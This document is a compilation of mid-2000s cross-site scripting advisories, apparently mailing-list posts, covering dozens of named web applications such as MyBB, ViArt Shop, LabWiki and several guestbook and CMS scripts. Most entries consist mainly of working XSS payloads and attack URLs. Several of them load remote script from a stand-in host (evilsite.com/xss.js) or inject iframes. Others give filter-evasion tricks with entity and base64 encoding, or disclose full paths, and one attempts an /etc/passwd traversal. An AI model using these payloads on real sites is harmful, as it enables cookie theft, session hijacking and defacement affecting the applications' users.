XSS Vulnerability On LarkinWEB Database Development, Web Site Design Marketing and Advertising System..

Runing HTML Codes, JScript etch...

XSS Vulerability URL : http://www.larkinweb.com/secure/error.asp?msg=[XSS]

Example:
http://www.larkinweb.com/secure/error.asp?msg=<script>window.location.href="http://members.lycos.co.uk/spymeta/hacked..jpg"<
+/script>

Attackers can Hack This System Administrator Cookies and Hacked This System...
Powered / Credit : SPYMETA
MSN & eMail : spymeta@yahoo.com

----------------------------------------------------------------------------------------------------

From: luny@youfucktard.com
To: bugtraq@securityfocus.com
Subject: LabWiki v1.0

LabWiki 1.0

Homepage:
http://www.bioinformatics.org/phplabware/labwiki/index.php

Effected files:
search.php

The search input box does not sanatize user input before dynamically genrating it.
XSS Proof of concept:

"><SCRIPT SRC=http://evilsite.com/xss.js></SCRIPT><"


----------------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------------
k 2.0 Remote XSS -
   -= http://colander.altervista.org/advisory/ASzGB.txt =-
------------------------------------------------------------------

	       -= ASPScriptz Guest Book 2.0 =-



Omnipresent
May 18, 2006


Vunerability(s):
----------------
XSS Attack


Product:
--------
ASPScriptz Guest Book 2.0

Vendor:
--------
http://www.aspscriptz.com


Description of product:
-----------------------

Guesbook is a free open source guestbook.Simply download it and unzip it and upload it into the root directory of your 
server.It is working now.Smilies support it also added in this version.Admin can disable or enable HTML support.Admin 
section is also included.


Vulnerability / Exploit:
------------------------

>From line 109 to line 113, there are the vulnerable code:

[...]

GBOOK_UNAME	=	REQUEST.FORM("GBOOK_UNAME")
GBOOK_EMAIL	=	REQUEST.FORM("GBOOK_EMAIL")
GBOOK_CITY	=	REQUEST.FORM("GBOOK_CITY")
GBOOK_COU	=	REQUEST.FORM("GBOOK_COU")
GBOOK_WWW	=	REQUEST.FORM("GBOOK_WWW")

[...]

As you can see, the variables:
GBOOK_UNAME
GBOOK_CITY
GBOOK_COU

are not properly sanitized before being used, so a remote attacker can inject arbitrary HTML code.

So, the programmer for delete the bug can modify the source code with a simple replace().


PoC / Proof of Concept of SQL Injection:
----------------------------------------

Not very hard.. :D Just put <script>alert("XSS")</script> in the Name, City and Country fields.

Vendor Status
-------------

[2006/06/05] Vendor Informed!

Credits:
--------
omnipresent
omnipresent@email.it
----------------------------------------------------------------------------------------------------
ParticleSoft Whois v1.0.3

Homepage:
http://www.particlesoft.net/particlewhois/

XSS Proof of concept viaurl injection:
http://whois.particlesoft.net/index.php?do=runcheck&target="><iframe src=http://evilsite.com/scriptlet.html <<"&ext=all

XSS Via input box:
"><iframe src=http://evilsite.com/scriptlet.html <<"
----------------------------------------------------------------------------------------------------
ParticleSoft Wiki v1.0.2

Effected files:

input boxes on editing pages:

XSS Proof of concept:

We notice br tags are allowed, so by using a STYLE attribute using a comment to break up expression we can create a XSS vuln:

Put the following in when editing a page:

<br IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">

Thanks to Rsnake & Roman Ivanov for the above xss example code.
----------------------------------------------------------------------------------------------------
GANTTy v1.0.3

Homepage:
http://www.gantty.com

Effected files:
index.php

XSS Vulnerabilities PoC:

XSS Vulnerability:
http://www.example.com/index.php?action=login&message=<IMG SRC=javascript:alert('XSS')>+email&lang=


Full path disclosure error:
http://www.example.com/index.php?action=authenticate&lang='
Error: FILE /var/www/username/actions/authenticate.php 
----------------------------------------------------------------------------------------------------
// MyBB 1.1.2 New XSS

	File :- private.php
    Ver. :- $do = $mybb->input['do'];
    Line :- 260
    Action :- Preview

    HTTP Proof :-
/mybb/private.php?to=asda&subject=asd%3E&font=-&size=-&color=-&mode=advanced&message=sd&options%5Bsavecopy%5D=yes&options%5Breadreceipt%5D=yes&action=do_send&pmid=&do=D3vil-0x1%22%3E%3Cscript%3Ealert(1);%3C/script%3E&preview=Preview


    // Code
      <input type="hidden" name="do" value="D3vil-0x1"><script>alert(1);</script>" />
    //
PBLGuestbook v1.31

Homepage:
http://www.pixelatedbylev.com/

Effected files:
input boxes of the guestbook.

XSS Vulnerabilities PoC:

I noticed that common tags like <script> are filtered into the words "SCRIPT BLOCKED" in this guestbook, however img tags as well as others go unfiltered in the Name, Email,and Website boxes. In turn, this could cause an XSS 

attack to occur. For PoC just enter: <IMG SRC=javascript:alert('XSS')> in any of these boxes.
----------------------------------------------------------------------------------------------------
ViArt Shop v2.5.5 Free (and possibly Light, Standard, and Enterprise)

Authors Site: http://www.codetosell.com/

+-[Examples:]--------------------------------------------------+

XSS:

/forum.php?forum_id="><script>alert('XSS');</script>&category_id=1

/reviews.php?category_id=0&item_id=4&rnd=1149618267&action=1&item_id="><scri
pt>alert('XSS');</script>&category_id=0&recommended=1&rating=0&summary=1&com
ments=1&user_name=1


+-[Notes:]-----------------------------------------------------+

Vulnerabilities found on: 6 June 2006
Author(s) Informed on: 7 June 2006
Author(s) Response: 7 June 2006
Author(s) Fix: 7 June 2006

Authors Fix: http://www.codetosell.com/downloads/xss_fix.zip

JohnC@NoBytes.com

http://www.NoBytes.com


----------------------------------------------------------------------------------------------------
E-Dating System

Homepage:
http://www.scriptsez.net/

Effected files:
Input boxes.
cindex.php

Description:

A Professional dating system that uses flatfiles instead of MySQL.


XSS Vulnerabilities PoC:

The input boxes of sending a message, and editing your profile do not properally filter user input before generating it. 

The script add's backslashes to ' and " but we can easily get around this by changing ' into &#0000039. forPoC input the 

following in anyof the above boxes mentioned:

<IMG SRC=javascript:alert(&#0000039XSS&#0000039)>


Full path disclosure error by url injection of trying to read a nonexistant message:

http://www.example.comcindex.php?action=dologin&nav=messagebox&do=read&id=999720979&st=1

Warning: rename(files/rofl/999720979&~@&1.txt,files/rofl/999720979&~@&0.txt): No such file or directory in /home/www/

domain/demo/dating/gmain.php on line 733

We now know the dir /files/username/ is where we can view users profiles, data and messages, this dir is also said tobe chmoded to 777 in the install instructs. Since none of the data was sanatized by input box before being stored in this flatfile, this data will also create XSS examples, plus also lets us view any users private messages in plain text format as well.

Another XSS Vuln via id:

http://www.example.com/cindex.php?action=dologin&nav=messagebox&do=read&id=<IMG SRC=javascript:alert(&#0000039XSS&#0000039)>&st=1
----------------------------------------------------------------------------------------------------
vSCAL and vREAL v1.0

Homepage:
http://www.babykatiemedia.com/

Effected files:
index.php
myslideshow.php

XSS Vulnerability via lid variable:
http://www.example.com/vscal/index.php?page=showlisting&lid=<SCRIPT%20SRC=evilsite.com//xss.js></SCRIPT>

XSS Vulnerability via myslideshow.php

http://www.example.com/vscal/myslideshow.php?dir=./listings/317/images/&title=listing+317:+1966+Buick+<SCRIPT%20SRC=http://evilsite.com/xss.js></SCRIPT>
Chemical Directory v.unknown (doesnt say on website) 

Homepage:
http://www.scriptsez.net/ 

Effected files:
dictionary.php

XSS Vulnerability via keyword variable:

http://www.example.com/dictionary.php?action=browse&keyword=e[SCRIPT SRC=http://evilsite.com/xss.js][/SCRIPT]
----------------------------------------------------------------------------------------------------
Easy Ad-Manager v. (unknown, not listed on homepage)

Homepage:
http://www.scriptsez.net

Effected files:
details.php

XSS Vulnerability with full path disclosure:

http://www.example.com/eam/details.php?do=load&mbid=/<SCRIPT%20SRC=http://evilsite.com/xss.js></SCRIPT>

Warning: fopen(stats//This is remote text via xss.js located at evilsite.combanner_cookie=visited%3Bvisited%3B.vis): 

failed to open stream: No such file or directory in /home/www/domainname/demo/eam/details.php on line 268

Warning: fwrite(): supplied argument is not a valid stream resource in /home/www/domain/demo/eam/details.php on 

line 269

Warning: fclose(): supplied argument is not a valid stream resource in /home/www/domain/demo/eam/details.php on 

line 270

Warning: Cannot modify header information - headers already sent by (output started at /home/www/domain/demo/

eam/details.php:268) in /home/www/domain/demo/eam/details.php on line 272
----------------------------------------------------------------------------------------------------
Ez Ringtone Manager

Homepage:
http://www.scriptsez.net

Effected files:
player.php
search input box.

XSS Vulnerabilities:

http://example.com/ringtones/player.php?action=preview&id=<SCRIPT%20SRC=http://evilsite.com/xss.js></SCRIPT>&cat=LG%20Mobiles

The search box doesnt properlly filter user input. Tags like <script> are filtered, and backslashes are added for ' and " 

We can get around this by simply using a <img> tag and &#0000039 for '. Poc:
<IMG SRC=javascript:alert(&#0000039XSS&#0000039)>
----------------------------------------------------------------------------------------------------
This release fixes a recently declared XSS vulnerability. Anyone using tikiwiki 1.9.x should upgrade asap.
http://tikiwiki.org/tiki-read_article.php?articleId=131
----------------------------------------------------------------------------------------------------
[MajorSecurity #10]i.List <= 1.5 - XSS 
----------------------------------------

Software: i.List

Version: <=1.5

Type: XSS

Date: June, 8th 2006

Vendor: Skoom

Page: http://skoom.de


Credits:
-------------------------------

David 'Aesthetico' Vieira-Kurz

http://www.majorsecurity.de


Affected Products:
-------------------------------

i.List 1.5 and prior


Description:
-------------------------------

i.List is a php/mysql TOPLIST script.

Requirements:
-------------------------------

register_globals = On


Vulnerability:
-------------------------------

Input passed to the Inputbox in "search.php", the 'URL' inputbox
and 'ButtonURL' in "add.php" is not properly filtered and verified, before it is used.
This can be exploited to execute evil XSS-code.

Solution:
-------------------------------

Edit the source code to ensure that input is properly sanitised.
Set "register_globals" to "Off".


Exploitation:
-------------------------------
In the inputbox of /search.php:
Search for: <script>alert("MajorSecurity")</script>

In the inputbox 'URL' of add.php:
Type in as URL: <script>alert("MajorSecurity")</script>

In the inputbox 'ButtonURL' of add.php:
Type in as URL: <script>alert("MajorSecurity")</script>







----------------------------------------------------------------------------------------------------
OkMall v1.0

Homepage:
http://www.okscripts.com/

Effected files:

search.php

XSS Vulnerabilities:

The search inputbox doesn’t properally filter using input before generating it.  Backslashes areadded but we can easily
evade this. 

ForPoC try putting a [imgsrc=lol.jpg]in the search box.


XSS vuln via URLinjection with possible buffer overflow?:

http://www.example.com/okmall/demo/search.php?q=a%20%20b%20e%20&mcdir=5&page=[SCRIPT%20SRC=http://evilsite.com/xss.js][/SCRIPT]

The above PoC creates the error msg:

Warning: fopen(http://xml.amazon.com/onca/xml3?locale=us&t=boxxnetcom-20&dev-t=06464ERBRYHMP1RY3W82&KeywordSearch=a__b_e_&sort=+pmrank&offer=All&mode=classical&type=lite&page=This is remote text via xss.jslocated at evilsite.com&f=xml): failed to open stream: HTTP request failed! HTTP/1.1 500 Server Error in /usr/www/virtual/fithcash/domain/okmall/demo/xml.php on line 59

Warning: feof(): supplied argument is not a valid stream resource in /usr/www/virtual/fithcash/domain/okmall/demo/xml.php on line 60

Warning: fread(): supplied argument is not a valid stream resource in /usr/www/virtual/fithcash/domain/okmall/demo/xml.php on line 61

and continuously outputs feof() and fread() error messages on the page. Buffer overflow? 

------------------------

QuickLinks v1.1

Homepage:
http://www.okscripts.com/

Effected files:

cat.php

XSS Vulnerabilities:

The search inputbox doesn’t properally filter using input before generating it. Backslashes areadded but we can easilyevade this. ForPoC try putting [IMG SRC=javascript:alert(’XSS’)] in the search box.

XSS vuln via URL injection:
http://www.example.com/quicklinks/demo/search.php?q=[SCRIPT%20SRC=http://evilsite.com/xss.js][/SCRIPT] 

--------------------------------------

OKArticles v1.0


Homepage:
http://www.okscripts.com/

Effected files:

search.php

XSS Vulnerabilities:

The search inputbox doesn’t properally filter using input before generating it.  Backslashes areadded but we can easilyevade this. For PoC try putting [IMG SRC=javascript:alert(’XSS’)] in the search box.

XSS vuln via URL  injection:
http://www.example.com/okarticles/demo/search.php?q=[SCRIPT%20SRC=http://evilsite.com/xss.js][/SCRIPT] 
----------------------------------------------------------------------------------------------------
iFoto v0.20-06/06/06

Homepage:
http://ifoto.ireans.com/

Effected files:

XSS Vulnerability:

The dir path to show the image is base 64 encoded, so to attempt this XSS example we encode our codein base64.

The code we'll be using is javascript in an iframe tag. [IFRAME SRC="javascript:alert('XSS');"][/IFRAME]

http://www.example.com/?dir=Scene&file=PElGUkFNRSBTUkM9ImphdmFzY3JpcHQ6YWxlcnQoJ1hTUycpOyI+PC9JRlJBTUU+
----------------------------------------------------------------------------------------------------
phazizGuestbook v2.0


Homepage:
http://www.devhome.de/#english_version

Effected files:
input boxes of name, email, url, text.

XSS Vulnerability:
None of these input boxes sanatize user input before generating it. for PoC put <IMG SRC=javascript:alert(&#00000XSS')> in any of the above boxes. 
----------------------------------------------------------------------------------------------------
Ticket Booking Script

Homepage:
http://www.mole.com.ua

Effected files:
input boxes on booking2.php

XSS Vulnerabilities:

The input boxes on booking2.php do not sanatize userinput before geenrating it and then submitting it to a MySQL db. This can causes XSS examples as well as possible SQL injections.

For PoC just put <SCRIPT SRC=http://www.evilsite.com/xss.js></SCRIPT> in any of the input boxes 
----------------------------------------------------------------------------------------------------
MobeSpace v2.0

Homepage:
http://mobescripts.com/

Effected files:
index.php

The input forms of:

- Profile
- Comments
- Uploading a file to your locker
- Posting in your blog
- Creating a caption for your pic
- Sending PM's

The input boxes of the above do not sanatize user input before generating it. for PoC just trying putting: 

<IMG SRC=javascript:alert('XSS')>

--------------------------------

XSS Vulnerability with SQL query error msg:

http://mobespace.com/index.php?browse=[SCRIPT%20SRC=http://evilsite.com/xss.js][/SCRIPT]&q=&update=Search&page=search&search=Search+DataBase

You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'This is remote text via xss.js located at evilsite.comPHPSESSID=004baf662f7d63889816e037a6bb2e56 WHERE name LIK 

-------------------------------

Possible directory traversal via rss feed:

http://www.example.com/index.php?page=rss&uid=/../../../../etc/passwd/
----------------------------------------------------------------------------------------------------
TinyMuw v1.0

Homepage:
http://www.l0j1k.com/tinyMuw/index.php

Effected files:
quickchat.php input box
videoPage.php

Input isn't sanatized before being generated in the quickchat.php chatbox. For PoC try putting:
<IMG SRC=javascript:alert('XSS')> in as your comment.

Full path disclosure error via URL Injection:

http://www.example.com/tinyMuw/videoPage.php?id=28'

Fatal error: Using $this when not in object context in /home/user/public_html/tinyMuw/tinyMuw/video.php on line 18 
----------------------------------------------------------------------------------------------------
Hello,

I have discovered a XSS vunerability in the Contensis
CMS. 

Input passed to the "search" parameter when performing
a search and various fields when using the search isn't properly sanitised ...

The vendors own site was tested in Windows Internet Explorer - the search funstion did not work at all in my versions of Safari or Firefox:
http://www.contensis.net

Code example: <script>alert('hello world');</script>


thanks
smigoftheDump
----------------------------------------------------------------------------------------------------
Title:
[Kil13r-SA-20060609-1] Daum Search Cross-Site Scripting Vulnerability

Author:
Kil13r - http://www.kil13r.info/

Local / Remote:
Remote

Timeline:
2006/06/09 - Discovery
2006/06/09 - Vendor notification
2006/06/09 - Release

Affected version:

Not affected version:

Description:
Daum is internet portal site, but that has vulnerability.
It can run arbitrary Javascript code by end user in search engine.

If victim execute arbitrary Javascript code, attacker can steal victim's cookie.

Proof of Concept code:
None

Proof of Concept example:
None

Proof of Concept screenshot:
http://www.kil13r.info/sa/xss/daumxss.jpg
----------------------------------------------------------------------------------------------------
Title:
[Kil13r-SA-20060609-2] DaNaWa Search Cross-Site Scripting Vulnerability

Author:
Kil13r - http://www.kil13r.info/

Local / Remote:
Remote

Timeline:
2006/06/09 - Discovery
2006/06/09 - Vendor notification
2006/06/09 - Release

Affected version:

Not affected version:

Description:
DaNaWa is price comparison site, but that has vulnerability.
It can run arbitrary Javascript code by end user in search engine.

If victim execute arbitrary Javascript code, attacker can steal victim's cookie.

Proof of Concept code:
None

Proof of Concept example:
None

Proof of Concept screenshot:
http://www.kil13r.info/sa/xss/danawaxss.jpg
----------------------------------------------------------------------------------------------------
Title:
[Kil13r-SA-20060609-3] DreamWiz Search Cross-Site Scripting Vulnerability

Author:
Kil13r - http://www.kil13r.info/

Local / Remote:
Remote

Timeline:
2006/06/09 - Discovery
2006/06/09 - Vendor notification
2006/06/09 - Release

Affected version:

Not affected version:

Description:
DreamWiz is internet portal site, but that has vulnerability.
It can run arbitrary Javascript code by end user in search engine.

If victim execute arbitrary Javascript code, attacker can steal victim's cookie.

Proof of Concept code:
None

Proof of Concept example:
None

Proof of Concept screenshot:
http://www.kil13r.info/sa/xss/dreamwizxss.jpg
----------------------------------------------------------------------------------------------------